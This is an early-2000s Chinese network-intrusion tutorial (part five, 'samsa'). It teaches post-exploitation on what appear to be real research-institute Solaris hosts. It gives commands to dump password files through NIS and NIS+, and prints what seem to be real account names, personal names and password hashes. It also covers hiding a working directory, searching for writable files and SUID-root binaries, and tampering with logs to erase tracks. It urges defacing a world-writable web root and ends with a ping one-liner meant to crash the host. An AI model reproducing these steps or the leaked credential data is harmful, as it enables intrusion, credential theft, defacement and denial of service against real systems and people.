samsa网络入侵教程五

/ns/cn/jc/data/20010129103927.htm

四、溜门撬锁
一旦在目标机上获得一个(普通用户)shell,能做的事情就多了
1) /etc/passwd , /etc/shadow
能看则看,能取则取,能破则破
1.1) 直接(no NIS)

$ cat /etc/passwd
......

1.2) NIS(yp:yellow page)

$ domainname
cas.ac.cn
$ ypwhich -d cas.ac.cn
$ ypcat passwd

1.3) NIS+

ox% domainname
ios.ac.cn
ox% nisls
ios.ac.cn:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.cn.:
passwd
group
auto_master
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% niscat passwd.org_dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445::::::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....

(samsa:gotcha!!!)

2) 寻找系统漏洞
2.0) 搜集信息

ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox% domainname
ios.ac.cn
ox% ifconfig -a
lo0: flags=849<UP,LOOPBACK,RUNNING,MULTICAST> mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863<UP,BROADCAST,NOTRAILERS,RUNNING,MULTICAST> mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0<RUNNING,NOARP> mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
127.0.0.1 127.0.0.1 UH 0 738 lo0
159.226.5.128 159.226.5.188 U 3 341 be0
224.0.0.0 159.226.5.188 U 3 0 be0
default 159.226.5.189 UG 0 1198
......

2.1) 寻找可写文件、目录

ox% cd /tmp
ox% mkdir .hide
ox% cd .hide
ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800
-a -perm -0020 \) \) -print` >.wr

(samsa:wr=writables:可写目录、文件)

ox% grep '^d' .wr > .wd

(samsa:wd=writable directories:目录)

ox% grep '^-' .wr > .wf

(samsa:wf=writable files:普通文件)

ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr

(samsa:sr=suid roots)

2.1.1) 系统配置文件可写:e.g.pam.conf,inetd.conf,inittab,passwd,etc.
2.1.2) bin 目录可写:e.g./usr/bin,/usr/local/bin,etc. (see:Trojan horses)
2.1.3) log 文件可写:e.g./var/adm/wtmp,/var/adm/messges,etc.(for track-erasing)

2.2) 篡改主页
绝大多数系统 http 根目录下权限设置有误!不信请看:

ox1% grep http /etc/inetd.conf
ox1% ps -ef | grep http
http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd
f /opt/home1/ofc/http/httpd/conf/httpd.conf
http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd
f /opt/home1/ofc/http/httpd/conf/httpd.conf
root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd
f /opt/home1/ofc/http/httpd/conf/httpd.conf
......
ox1% cd /opt/home1/ofc/http/httpd
ox1% ls -l |more
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research

(samsa:哈哈!!差不多全都可以写,太牛了,改吧,还等什么??)

3) 拒绝服务(DoS:Denial of Service)
利用系统漏洞捣乱
e.g. Solaris 2.5(2.5.1)下:

$ ping -sv -i 127.0.0.1 224.0.0.1
PING 224.0.0.1 56 data bytes

(samsa:于是机器就reboot乐,荷荷)